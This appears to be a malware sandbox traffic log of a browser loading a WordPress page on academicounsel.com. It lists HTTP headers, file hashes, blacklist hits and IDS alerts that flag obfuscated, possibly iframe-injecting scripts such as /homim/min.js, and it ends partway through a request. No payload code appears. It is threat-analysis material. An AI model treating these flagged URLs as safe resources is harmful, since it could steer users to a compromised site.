Vary: Accept-Encoding
X-Cache: HIT


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   5376
Md5:    0488acb800bf92469c5f36c231db2c26
Sha1:   2b2504a83b7bd09bae626edc06c11bdc2a6de805
Sha256: d538f5bee062c9597cd251cbb45dcd0f934532b9979b9310253863577a86c9c5
                                        
                                            GET /css?family=Open+Sans&subset=latin HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         216.58.211.10
HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
                                        
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Expires: Thu, 31 May 2018 16:17:52 GMT
Date: Thu, 31 May 2018 16:17:52 GMT
Cache-Control: private, max-age=86400
Content-Encoding: gzip
Transfer-Encoding: chunked
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   199
Md5:    375313158e168fdf76ac7b1052c7b459
Sha1:   9462ec744421b707ff4d2aac5ad7dcf09bcc63d4
Sha256: 9d4fb0d39c8811b04957fb62443cbd6263f958056ab33cd5fda1ed0e720ad95a
                                        
                                            GET /wp-content/themes/theme48340/bootstrap/css/responsive.css HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Server: Apache
Last-Modified: Fri, 26 Sep 2014 18:46:38 GMT
Etag: "55b9-503fc564bbf80-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Fri, 01 Jun 2018 16:17:52 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4226
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   4226
Md5:    6325eab6a8fba55e127f4091b77ca770
Sha1:   59f9e919682320353d9bb9ef46e816a0c7e005eb
Sha256: 0fe5cf8a111e7368ab84fc34bed765f913c0a45c1a10b109d72d09bd26357acb
                                        
                                            GET /wp-content/themes/CherryFramework/css/camera.css HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Server: Apache
Last-Modified: Sun, 28 Sep 2014 07:32:34 GMT
Etag: "6698-5041b27540880-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Fri, 01 Jun 2018 16:17:52 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3062
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   3062
Md5:    246e6d050fb1fcc0120507f8f6bf091f
Sha1:   ae17665fba767067c29c3de87ed9af55a256df2d
Sha256: b3c2599096a58b63f90cd239e38edf8b334ff1e75f076ed453fbc7c8e604ea8b
                                        
                                            GET /wp-content/plugins/cherry-plugin/lib/js/FlexSlider/flexslider.css?ver=2.0 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Server: Apache
Last-Modified: Fri, 26 Sep 2014 13:44:44 GMT
Etag: "e1d-503f81e9e0b00-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Fri, 01 Jun 2018 16:17:52 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1334
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   1334
Md5:    6f425223e8abd0147ca48f8b3fa29b8c
Sha1:   320b38daa42740ee85fb32ff2fd43d06a5fba02f
Sha256: 8876c764e710c7b9b019b7c1af80a92f282b6c706c3b9d94c9dcea2468ba23b7
                                        
                                            GET /wp-content/themes/theme48340/bootstrap/css/bootstrap.css HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Server: Apache
Last-Modified: Wed, 15 Oct 2014 06:29:01 GMT
Etag: "1a3a3-505703f5ba540-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Fri, 01 Jun 2018 16:17:52 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 16128
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   16128
Md5:    74d8c53ef4d20637ba25bc7a6e400264
Sha1:   d360fbe2c3074a40c8d3899a151736df875d83e5
Sha256: 813fec6c4559ae7a7c20ce019dde5f97a2fad2d3d69aeefbf0643398f0584fb8
                                        
                                            GET /wp-content/plugins/cherry-plugin/lib/js/owl-carousel/owl.carousel.css?ver=1.24 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Server: Apache
Last-Modified: Fri, 26 Sep 2014 13:44:44 GMT
Etag: "1808-503f81e9e0b00-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Fri, 01 Jun 2018 16:17:52 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1135
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   1135
Md5:    98dd9d8cc1627f21f7bb320e8c3ef68a
Sha1:   5d924134ea5ecc7cd4dfdbae7621b17d1969cc2a
Sha256: 9afeaadb58d3dffcd0fb6fec6c462affab8e02a0953b1978b6f1d283e8f3e937
                                        
                                            GET /wp-content/themes/theme48340/style.css HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Server: Apache
Last-Modified: Fri, 26 Sep 2014 18:46:38 GMT
Etag: "145-503fc564bbf80-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Fri, 01 Jun 2018 16:17:52 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 229
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   229
Md5:    360ba478981be22946ee1a8da2314029
Sha1:   b8df05e4ee7c0e68d6be38aaa1d552b2d8392c71
Sha256: 9c97a033ce0a0d8ec2800eb0cef66731fa12541e0b72f47abead27deb4d24dc5
                                        
                                            GET /wp-content/plugins/cherry-plugin/lib/js/owl-carousel/owl.theme.css?ver=1.24 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Server: Apache
Last-Modified: Fri, 26 Sep 2014 13:44:44 GMT
Etag: "6ce-503f81e9e0b00-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Fri, 01 Jun 2018 16:17:52 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 614
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   614
Md5:    5b5b7d8961092401cc830d20483b1c08
Sha1:   9e775ff04b362b69ef28826051b005f62c612494
Sha256: ec929f42b7fc76b4710a790e711df74e5ffac3ffbbaf3612a816b17ffa9b5758
                                        
                                            GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.0.1 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Server: Apache
Last-Modified: Fri, 17 Oct 2014 05:50:40 GMT
Etag: "44f-50597f1e3ec00-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Fri, 01 Jun 2018 16:17:52 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 469
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   469
Md5:    3a276951fd6e5687fcb83e1e6ad282a8
Sha1:   1b52d8ba9ab523170026b7f9be3e95481a6f3e06
Sha256: 6d879f788b9990bcb3c7ad7a1fc5abd27e9f417078a3f678b91e08ba8d57a671
                                        
                                            GET /wp-content/plugins/cherry-plugin/includes/css/cherry-plugin.css?ver=1.0 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Server: Apache
Last-Modified: Fri, 26 Sep 2014 13:44:44 GMT
Etag: "6507-503f81e9e0b00-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Fri, 01 Jun 2018 16:17:52 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4765
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   4765
Md5:    730776c69fb7e07db5f7b4fe3448dc13
Sha1:   2d91fbb3e1fefc846630357168e3b7c56fa59fcb
Sha256: 47b60eb1248c59c5d6b1e42d58b8bfc24b101605dfe8a256ab78dcc3721cec42
                                        
                                            GET /wp-content/themes/CherryFramework/css/magnific-popup.css?ver=0.9.3 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Server: Apache
Last-Modified: Sun, 28 Sep 2014 07:32:34 GMT
Etag: "2458-5041b27540880-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Fri, 01 Jun 2018 16:17:52 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2166
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   2166
Md5:    a09ce8e4678cfe353277c1e09a0583bb
Sha1:   e68ca755adee445e3dc7245a3ce0e5ee977c6fc3
Sha256: 7777447189c5c3ab949af81760e6d78a9bf797c531383ad18cd71ec32a643213
                                        
                                            GET /wp-content/themes/theme48340/main-style.css HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Server: Apache
Last-Modified: Wed, 15 Oct 2014 06:29:02 GMT
Etag: "8177-505703f6ae780-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Fri, 01 Jun 2018 16:17:52 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 6077
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   6077
Md5:    bd78161c592336e30a3c8c6c6e49b441
Sha1:   3b8a5bf4b42f87612ff50605f4702335dc913241
Sha256: 691b5c260cda1070effb4fcb71fc0bfc3213fa591e7acb8c601882c3f450096c
                                        
                                            GET /css?family=Open+Sans:400,600,300,300italic HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/wp-content/themes/theme48340/main-style.css

                                         
                                         216.58.211.10
HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
                                        
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Expires: Thu, 31 May 2018 16:17:53 GMT
Date: Thu, 31 May 2018 16:17:53 GMT
Cache-Control: private, max-age=86400
Content-Encoding: gzip
Transfer-Encoding: chunked
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   292
Md5:    bcc5c4cc833ca40408fcdfef71d94b2e
Sha1:   7ce187477bb5d25205845c699f5bec7b12881afa
Sha256: 8b9ca75595c55dd4e707499a5da2be071463eaf3e47c4a0f623a85df873cad60
                                        
                                            GET /wp-includes/js/swfobject.js?ver=2.2-20120417 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:28 GMT
Etag: "4d19-51fcfe4086500-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 9228
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   9228
Md5:    9d93a51c1bd8dae095edb83ade29a880
Sha1:   5f9bb7a6fcd0b8272017bdde950bdf61de2bbccd
Sha256: 7d5660372d03b1ab62ce6f38eefe8c69005e6d245173d4019ad253fd04865254

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.6 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:18 GMT
Etag: "5782-51fcfe36fce80-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 10565
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   10565
Md5:    546b420fa03f47dc0a3b96d68822e670
Sha1:   ee9f445618f1284b2831c1d8036c06e9046550b3
Sha256: e288eaac36f019e26719148c56cf15111ea88e25427bda95132ef0ab547db67c

Alerts:
  IDS:
    - ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
                                        
                                            GET /wp-content/themes/CherryFramework/js/custom.js?ver=1.0 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:50 GMT
Etag: "449b-51fcfe5581680-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 7649
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   7649
Md5:    5d9aacb5d7dc8bac565f942d8d487664
Sha1:   3f31ded6b496d91fd542f5e6b0b8a652b90e6cee
Sha256: f5c02ab19b062331ccae0d4584b249b024b30f03cad3c2936a5058b63a4b5874

Alerts:
  IDS:
    - ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
                                        
                                            GET /wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.0 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:38 GMT
Etag: "2ba2-51fcfe4a0fb80-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 5989
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   5989
Md5:    aac3b4c8330aa3e30e1a36ad85b7e17d
Sha1:   d3858d3c55fae09048f0e9f41e29544546aef7c2
Sha256: 9d8c78cf90c6e44cb9134c6b451946e579bc434fc56c1aa80c468b838aec13d9

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/CherryFramework/js/jquery-migrate-1.2.1.min.js?ver=1.2.1 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:27 GMT
Etag: "4148-51fcfe3f922c0-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 8377
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   8377
Md5:    429c40d7b8db909c6f7a924a5995344c
Sha1:   00e65c582281a450f0bc958b89a38a24d5c40bc0
Sha256: 90755b40f7862ef68ef993e928781f72fce941d33b4c0b04d3a5d348e90d9a05
                                        
                                            GET /wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:25 GMT
Etag: "199ed-51fcfe3da9e40-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:52 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 39337
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   39337
Md5:    b244cbf73e8a52114751ead287700e3c
Sha1:   9815ed376062a9974e31ada794f02df8303f5ce2
Sha256: fd48dd6cda78af172614b0eec015413ff69f79dbb9527fc9d605a09f375b7116

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-includes/js/comment-reply.min.js?ver=4.0.5 HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:24 GMT
Etag: "2a57-51fcfe3cb5c00-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 5797
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   5797
Md5:    3ed00f9823108b1178338329853e47a0
Sha1:   278b5ec414085baccc7ae94c17096ef6e6ea31c7
Sha256: 3bf42caa387b06a8f05849e885850c7c40929a1f4231e925148d3ce954039fb9

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
GET /homim/min.js HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Sun, 05 Jul 2015 00:50:38 GMT
Etag: "13ef-51a162d781380-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 673
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   673
Md5:    b520da869494998ad647a22240152d69
Sha1:   e61a236d0dfb5c2d64886b5423ba8b01e6df5ec3
Sha256: 5c818a551f24785178656cdc22fbff349e30e2da5370b9e89d67c3639cb53bb2

Alerts:
  Blacklists:
    - fortinet: Malware
  IDS:
    - ET INFO JJEncode Encoded Script
                                        
GET /wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0 HTTP/1.1
Host: academicounsel.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
132.148.50.1
HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Thu, 31 May 2018 16:17:53 GMT
Server: Apache
Last-Modified: Tue, 15 Sep 2015 21:30:21 GMT
Etag: "9587-51fcfe39d9540-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Thu, 07 Jun 2018 16:17:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 13183
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   13183
Md5:    089078a74b4861624bb92fb62e8eca94
Sha1:   f2810eaf499e1e92bd0509307796de6ebbecea85
Sha256: 091664ad0b91c05dda641c4c2234fb2cb631946f2a04b31eaf436d276ddc80a9

Alerts:
  Blacklists:
    - fortinet: Malware
  IDS:
    - ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
                                        
GET /wp-content/themes/CherryFramework/js/jquery.mobile.customized.min.js HTTP/1.1
Host: academicounsel.com
